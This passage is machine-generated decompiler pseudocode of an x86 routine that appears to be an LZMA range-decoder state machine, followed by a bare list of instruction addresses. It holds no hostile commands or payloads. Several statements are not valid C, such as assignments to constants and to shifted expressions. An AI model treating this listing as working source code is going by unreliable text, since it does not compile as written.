											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
                                                                                                                                                              											if(__ebx >= 0x100) {
                                                                                                                                                              												goto L54;
                                                                                                                                                              											}
                                                                                                                                                              											L41:
                                                                                                                                                              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                              											__ecx =  *(__ebp - 0x58);
                                                                                                                                                              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                              											 *(__ebp - 0x48) = __eax;
                                                                                                                                                              											__eax = __eax + 1;
                                                                                                                                                              											__eax = __eax << 8;
                                                                                                                                                              											__eax = __eax + __ebx;
                                                                                                                                                              											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              											__ax =  *__esi;
                                                                                                                                                              											 *(__ebp - 0x54) = __esi;
                                                                                                                                                              											__edx = __ax & 0x0000ffff;
                                                                                                                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              												__cx = __ax;
                                                                                                                                                              												 *(__ebp - 0x40) = 1;
                                                                                                                                                              												__cx = __ax >> 5;
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												__ebx = __ebx + __ebx + 1;
                                                                                                                                                              												 *__esi = __ax;
                                                                                                                                                              											} else {
                                                                                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                              												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              												0x800 = 0x800 - __edx;
                                                                                                                                                              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                              												__ebx = __ebx + __ebx;
                                                                                                                                                              												 *__esi = __cx;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              												goto L39;
                                                                                                                                                              											} else {
                                                                                                                                                              												L45:
                                                                                                                                                              												goto L37;
                                                                                                                                                              											}
                                                                                                                                                              										case 0xe:
                                                                                                                                                              											L46:
                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              												L160:
                                                                                                                                                              												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											L47:
                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											_t156 = __ebp - 0x70;
                                                                                                                                                              											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              											__eflags =  *_t156;
                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											while(1) {
                                                                                                                                                              												L48:
                                                                                                                                                              												__eflags = __ebx - 0x100;
                                                                                                                                                              												if(__ebx >= 0x100) {
                                                                                                                                                              													break;
                                                                                                                                                              												}
                                                                                                                                                              												L49:
                                                                                                                                                              												__eax =  *(__ebp - 0x58);
                                                                                                                                                              												__edx = __ebx + __ebx;
                                                                                                                                                              												__ecx =  *(__ebp - 0x10);
                                                                                                                                                              												__esi = __edx + __eax;
                                                                                                                                                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                              												__edi = __ax & 0x0000ffff;
                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              													__cx = __ax;
                                                                                                                                                              													_t170 = __edx + 1; // 0x1
                                                                                                                                                              													__ebx = _t170;
                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              													0x800 = 0x800 - __edi;
                                                                                                                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              													__ebx = __ebx + __ebx;
                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              													continue;
                                                                                                                                                              												} else {
                                                                                                                                                              													L53:
                                                                                                                                                              													goto L46;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											L54:
                                                                                                                                                              											_t173 = __ebp - 0x34;
                                                                                                                                                              											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                              											__eflags =  *_t173;
                                                                                                                                                              											goto L55;
                                                                                                                                                              										case 0xf:
                                                                                                                                                              											L58:
                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              												L161:
                                                                                                                                                              												 *(__ebp - 0x88) = 0xf;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											L59:
                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											_t203 = __ebp - 0x70;
                                                                                                                                                              											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              											__eflags =  *_t203;
                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											L60:
                                                                                                                                                              											__eflags = __ebx - 0x100;
                                                                                                                                                              											if(__ebx >= 0x100) {
                                                                                                                                                              												L55:
                                                                                                                                                              												__al =  *(__ebp - 0x44);
                                                                                                                                                              												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                              												goto L56;
                                                                                                                                                              											}
                                                                                                                                                              											L61:
                                                                                                                                                              											__eax =  *(__ebp - 0x58);
                                                                                                                                                              											__edx = __ebx + __ebx;
                                                                                                                                                              											__ecx =  *(__ebp - 0x10);
                                                                                                                                                              											__esi = __edx + __eax;
                                                                                                                                                              											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              											__ax =  *__esi;
	*(__ebp - 0x54) = __esi;
	__edi = __ax & 0x0000ffff;
	__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
	__eflags =  *(__ebp - 0xc) - __ecx;
	if( *(__ebp - 0xc) >= __ecx) {
		*(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
		*(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
		__cx = __ax;
		_t217 = __edx + 1; // 0x1
		__ebx = _t217;
		__cx = __ax >> 5;
		__eflags = __eax;
		*__esi = __ax;
	} else {
		*(__ebp - 0x10) = __ecx;
		0x800 = 0x800 - __edi;
		0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
		__ebx = __ebx + __ebx;
		*__esi = __cx;
	}
	__eflags =  *(__ebp - 0x10) - 0x1000000;
	*(__ebp - 0x44) = __ebx;
	if( *(__ebp - 0x10) >= 0x1000000) {
		goto L60;
	} else {
		L65:
		goto L58;
	}
case 0x10:
	L109:
	__eflags =  *(__ebp - 0x6c);
	if( *(__ebp - 0x6c) == 0) {
		L165:
		*(__ebp - 0x88) = 0x10;
		goto L170;
	}
	L110:
	__ecx =  *(__ebp - 0x70);
	__eax =  *(__ebp - 0xc);
	*(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
	__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
	*(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
	*(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
	_t365 = __ebp - 0x70;
	*_t365 =  *(__ebp - 0x70) + 1;
	__eflags =  *_t365;
	*(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
	goto L111;
case 0x11:
	L69:
	__esi =  *(__ebp - 0x58);
	*(__ebp - 0x84) = 0x12;
	goto L132;
case 0x12:
	L128:
	__eflags =  *(__ebp - 0x40);
	if( *(__ebp - 0x40) != 0) {
		L131:
		__eax =  *(__ebp - 0x58);
		*(__ebp - 0x84) = 0x13;
		__esi =  *(__ebp - 0x58) + 2;
		L132:
		*(_t644 - 0x54) = _t642;
		goto L133;
	}
	L129:
	__eax =  *(__ebp - 0x4c);
	*(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
	__ecx =  *(__ebp - 0x58);
	__eax =  *(__ebp - 0x4c) << 4;
	__eflags = __eax;
	__eax =  *(__ebp - 0x58) + __eax + 4;
	goto L130;
case 0x13:
	L141:
	__eflags =  *(__ebp - 0x40);
	if( *(__ebp - 0x40) != 0) {
		L143:
		_t469 = __ebp - 0x58;
		*_t469 =  *(__ebp - 0x58) + 0x204;
		__eflags =  *_t469;
		*(__ebp - 0x30) = 0x10;
		*(__ebp - 0x40) = 8;
		L144:
		*((intOrPtr*)(__ebp - 0x7c)) = 0x14;
		L145:
		*(_t644 - 0x50) = 1;
		*(_t644 - 0x48) =  *(_t644 - 0x40);
		goto L149;
	}
	L142:
	__eax =  *(__ebp - 0x4c);
	__ecx =  *(__ebp - 0x58);
	__eax =  *(__ebp - 0x4c) << 4;
	*(__ebp - 0x30) = 8;
	__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
	L130:
	*(__ebp - 0x58) = __eax;
	*(__ebp - 0x40) = 3;
	goto L144;
case 0x14:
	L156:
	*(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
	__eax =  *(__ebp - 0x80);
	while(1) {
		L140:
		*(_t644 - 0x88) = _t537;
		goto L1;
	}
case 0x15:
	L91:
	__eax = 0;
	__eflags =  *(__ebp - 0x38) - 7;
	0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
	__al = __al & 0x000000fd;
	__eax = (__eflags >= 0) - 1 + 0xb;
	*(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
	goto L120;
case 0x16:
	goto L0;
case 0x17:
	while(1) {
		L145:
		*(_t644 - 0x50) = 1;
		*(_t644 - 0x48) =  *(_t644 - 0x40);
		goto L149;
	}
case 0x18:
	goto L146;
case 0x19:
	L94:
	__eflags = __ebx - 4;
	if(__ebx < 4) {
		L98:
		*(__ebp - 0x2c) = __ebx;
		L119:
		_t393 = __ebp - 0x2c;
		*_t393 =  *(__ebp - 0x2c) + 1;
		__eflags =  *_t393;
		L120:
		__eax =  *(__ebp - 0x2c);
		__eflags = __eax;
		if(__eax == 0) {
			L166:
			*(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
			goto L170;
		}
		L121:
		__eflags = __eax -  *(__ebp - 0x60);
		if(__eax >  *(__ebp - 0x60)) {
			goto L171;
		}
		L122:
		*(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
		__eax =  *(__ebp - 0x30);
		_t400 = __ebp - 0x60;
		*_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
		__eflags =  *_t400;
		goto L123;
	}
	L95:
	__ecx = __ebx;
	__eax = __ebx;
	__ecx = __ebx >> 1;
	__eax = __ebx & 0x00000001;
	__ecx = (__ebx >> 1) - 1;
	__al = __al | 0x00000002;
	__eax = (__ebx & 0x00000001) << __cl;
	__eflags = __ebx - 0xe;
	*(__ebp - 0x2c) = __eax;
	if(__ebx >= 0xe) {
		L97:
		__ebx = 0;
		*(__ebp - 0x48) = __ecx;
		L102:
		__eflags =  *(__ebp - 0x48);
		if( *(__ebp - 0x48) <= 0) {
			L107:
			__eax = __eax + __ebx;
			*(__ebp - 0x40) = 4;
			*(__ebp - 0x2c) = __eax;
			__eax =  *(__ebp - 4);
			__eax =  *(__ebp - 4) + 0x644;
			__eflags = __eax;
			L108:
			__ebx = 0;
			*(__ebp - 0x58) = __eax;
			*(__ebp - 0x50) = 1;
			*(__ebp - 0x44) = 0;
			*(__ebp - 0x48) = 0;
                                                                                                                                                              													L112:
                                                                                                                                                              													__eax =  *(__ebp - 0x40);
                                                                                                                                                              													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                              													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                              														L118:
                                                                                                                                                              														_t391 = __ebp - 0x2c;
                                                                                                                                                              														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                              														__eflags =  *_t391;
                                                                                                                                                              														goto L119;
                                                                                                                                                              													}
                                                                                                                                                              													L113:
                                                                                                                                                              													__eax =  *(__ebp - 0x50);
                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                              													__eax =  *(__ebp - 0x58);
                                                                                                                                                              													__esi = __edi + __eax;
                                                                                                                                                              													 *(__ebp - 0x54) = __esi;
                                                                                                                                                              													__ax =  *__esi;
                                                                                                                                                              													__ecx = __ax & 0x0000ffff;
                                                                                                                                                              													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                              													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                              													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                              														__ecx = 0;
                                                                                                                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                              														__ecx = 1;
                                                                                                                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                              														__ebx = 1;
                                                                                                                                                              														__ecx =  *(__ebp - 0x48);
                                                                                                                                                              														__ebx = 1 << __cl;
                                                                                                                                                              														__ecx = 1 << __cl;
                                                                                                                                                              														__ebx =  *(__ebp - 0x44);
                                                                                                                                                              														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                              														__cx = __ax;
                                                                                                                                                              														__cx = __ax >> 5;
                                                                                                                                                              														__eax = __eax - __ecx;
                                                                                                                                                              														__edi = __edi + 1;
                                                                                                                                                              														__eflags = __edi;
                                                                                                                                                              														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              														 *__esi = __ax;
                                                                                                                                                              														 *(__ebp - 0x50) = __edi;
                                                                                                                                                              													} else {
                                                                                                                                                              														 *(__ebp - 0x10) = __edx;
                                                                                                                                                              														0x800 = 0x800 - __ecx;
                                                                                                                                                              														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                              														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                              														 *__esi = __dx;
                                                                                                                                                              													}
                                                                                                                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              														L111:
                                                                                                                                                              														_t368 = __ebp - 0x48;
                                                                                                                                                              														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                              														__eflags =  *_t368;
                                                                                                                                                              														goto L112;
                                                                                                                                                              													} else {
                                                                                                                                                              														L117:
                                                                                                                                                              														goto L109;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												L103:
                                                                                                                                                              												__ecx =  *(__ebp - 0xc);
                                                                                                                                                              												__ebx = __ebx + __ebx;
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                              												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                              													__ecx =  *(__ebp - 0x10);
                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                              													__ebx = __ebx | 0x00000001;
                                                                                                                                                              													__eflags = __ebx;
                                                                                                                                                              													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              													L101:
                                                                                                                                                              													_t338 = __ebp - 0x48;
                                                                                                                                                              													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                              													__eflags =  *_t338;
                                                                                                                                                              													goto L102;
                                                                                                                                                              												} else {
                                                                                                                                                              													L106:
                                                                                                                                                              													goto L99;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											L96:
                                                                                                                                                              											__edx =  *(__ebp - 4);
                                                                                                                                                              											__eax = __eax - __ebx;
                                                                                                                                                              											 *(__ebp - 0x40) = __ecx;
                                                                                                                                                              											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                              											goto L108;
                                                                                                                                                              										case 0x1a:
                                                                                                                                                              											L56:
                                                                                                                                                              											__eflags =  *(__ebp - 0x64);
                                                                                                                                                              											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              												L162:
                                                                                                                                                              												 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											L57:
                                                                                                                                                              											__ecx =  *(__ebp - 0x68);
                                                                                                                                                              											__al =  *(__ebp - 0x5c);
                                                                                                                                                              											__edx =  *(__ebp - 8);
                                                                                                                                                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                              											 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                              											__ecx =  *(__ebp - 0x14);
                                                                                                                                                              											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                              											__eax = __ecx + 1;
                                                                                                                                                              											__edx = 0;
                                                                                                                                                              											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              											__edx = _t192;
                                                                                                                                                              											goto L80;
                                                                                                                                                              										case 0x1b:
                                                                                                                                                              											L76:
                                                                                                                                                              											__eflags =  *(__ebp - 0x64);
                                                                                                                                                              											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              												L163:
                                                                                                                                                              												 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											L77:
                                                                                                                                                              											__eax =  *(__ebp - 0x14);
                                                                                                                                                              											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              											}
                                                                                                                                                              											__edx =  *(__ebp - 8);
                                                                                                                                                              											__cl =  *(__eax + __edx);
                                                                                                                                                              											__eax =  *(__ebp - 0x14);
                                                                                                                                                              											 *(__ebp - 0x5c) = __cl;
                                                                                                                                                              											 *(__eax + __edx) = __cl;
                                                                                                                                                              											__eax = __eax + 1;
                                                                                                                                                              											__edx = 0;
                                                                                                                                                              											_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              											__edx = _t275;
                                                                                                                                                              											__eax =  *(__ebp - 0x68);
                                                                                                                                                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              											_t284 = __ebp - 0x64;
                                                                                                                                                              											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                                                                                              											__eflags =  *_t284;
                                                                                                                                                              											 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                              											L80:
                                                                                                                                                              											 *(__ebp - 0x14) = __edx;
                                                                                                                                                              											goto L81;
                                                                                                                                                              										case 0x1c:
                                                                                                                                                              											while(1) {
                                                                                                                                                              												L123:
                                                                                                                                                              												__eflags =  *(__ebp - 0x64);
                                                                                                                                                              												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              													break;
                                                                                                                                                              												}
                                                                                                                                                              												L124:
                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              												}
                                                                                                                                                              												__edx =  *(__ebp - 8);
                                                                                                                                                              												__cl =  *(__eax + __edx);
                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                              												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                              												 *(__eax + __edx) = __cl;
                                                                                                                                                              												__eax = __eax + 1;
                                                                                                                                                              												__edx = 0;
                                                                                                                                                              												_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              												__edx = _t414;
                                                                                                                                                              												__eax =  *(__ebp - 0x68);
                                                                                                                                                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                              												__eflags =  *(__ebp - 0x30);
                                                                                                                                                              												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                              												 *(__ebp - 0x14) = _t414;
                                                                                                                                                              												if( *(__ebp - 0x30) > 0) {
                                                                                                                                                              													continue;
                                                                                                                                                              												} else {
                                                                                                                                                              													L127:
                                                                                                                                                              													L81:
                                                                                                                                                              													 *(__ebp - 0x88) = 2;
                                                                                                                                                              													goto L1;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											L167:
                                                                                                                                                              											 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                              											goto L170;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								L171:
                                                                                                                                                              								_t539 = _t538 | 0xffffffff;
                                                                                                                                                              								goto L172;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}















                                                                                                                                                              0x00405f0a
                                                                                                                                                              0x00405f0a
                                                                                                                                                              0x00405f0d
                                                                                                                                                              0x00405f11
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f13
                                                                                                                                                              0x00405f13
                                                                                                                                                              0x00405f19
                                                                                                                                                              0x00405f43
                                                                                                                                                              0x00405f49
                                                                                                                                                              0x00405f50
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f50
                                                                                                                                                              0x00405f1b
                                                                                                                                                              0x00405f1f
                                                                                                                                                              0x00405f22
                                                                                                                                                              0x00405f27
                                                                                                                                                              0x00405f27
                                                                                                                                                              0x00405f32
                                                                                                                                                              0x00405f3a
                                                                                                                                                              0x00405f3d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f82
                                                                                                                                                              0x00405f88
                                                                                                                                                              0x00405f8b
                                                                                                                                                              0x00405f98
                                                                                                                                                              0x00405fa0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f57
                                                                                                                                                              0x00405f57
                                                                                                                                                              0x00405f5b
                                                                                                                                                              0x004067a6
                                                                                                                                                              0x004067a6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067a6
                                                                                                                                                              0x00405f61
                                                                                                                                                              0x00405f67
                                                                                                                                                              0x00405f72
                                                                                                                                                              0x00405f72
                                                                                                                                                              0x00405f72
                                                                                                                                                              0x00405f75
                                                                                                                                                              0x00405f78
                                                                                                                                                              0x00405f7b
                                                                                                                                                              0x00405f80
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406617
                                                                                                                                                              0x00406617
                                                                                                                                                              0x0040661d
                                                                                                                                                              0x00406623
                                                                                                                                                              0x00406629
                                                                                                                                                              0x00406643
                                                                                                                                                              0x00406646
                                                                                                                                                              0x0040664c
                                                                                                                                                              0x00406657
                                                                                                                                                              0x00406657
                                                                                                                                                              0x00406659
                                                                                                                                                              0x0040662b
                                                                                                                                                              0x0040662b
                                                                                                                                                              0x0040663a
                                                                                                                                                              0x0040663e
                                                                                                                                                              0x0040663e
                                                                                                                                                              0x00406663
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406665
                                                                                                                                                              0x00406669
                                                                                                                                                              0x00406818
                                                                                                                                                              0x00406818
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406818
                                                                                                                                                              0x0040666f
                                                                                                                                                              0x00406675
                                                                                                                                                              0x0040667c
                                                                                                                                                              0x00406684
                                                                                                                                                              0x00406687
                                                                                                                                                              0x0040668a
                                                                                                                                                              0x0040668a
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405fa8
                                                                                                                                                              0x00405fa8
                                                                                                                                                              0x00405faa
                                                                                                                                                              0x00405fad
                                                                                                                                                              0x0040601e
                                                                                                                                                              0x0040601e
                                                                                                                                                              0x00406021
                                                                                                                                                              0x00406024
                                                                                                                                                              0x0040602b
                                                                                                                                                              0x00406035
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406035
                                                                                                                                                              0x00405faf
                                                                                                                                                              0x00405faf
                                                                                                                                                              0x00405fb3
                                                                                                                                                              0x00405fb6
                                                                                                                                                              0x00405fb8
                                                                                                                                                              0x00405fbb
                                                                                                                                                              0x00405fbe
                                                                                                                                                              0x00405fc0
                                                                                                                                                              0x00405fc3
                                                                                                                                                              0x00405fc5
                                                                                                                                                              0x00405fca
                                                                                                                                                              0x00405fcd
                                                                                                                                                              0x00405fd0
                                                                                                                                                              0x00405fd4
                                                                                                                                                              0x00405fdb
                                                                                                                                                              0x00405fde
                                                                                                                                                              0x00405fe5
                                                                                                                                                              0x00405fe9
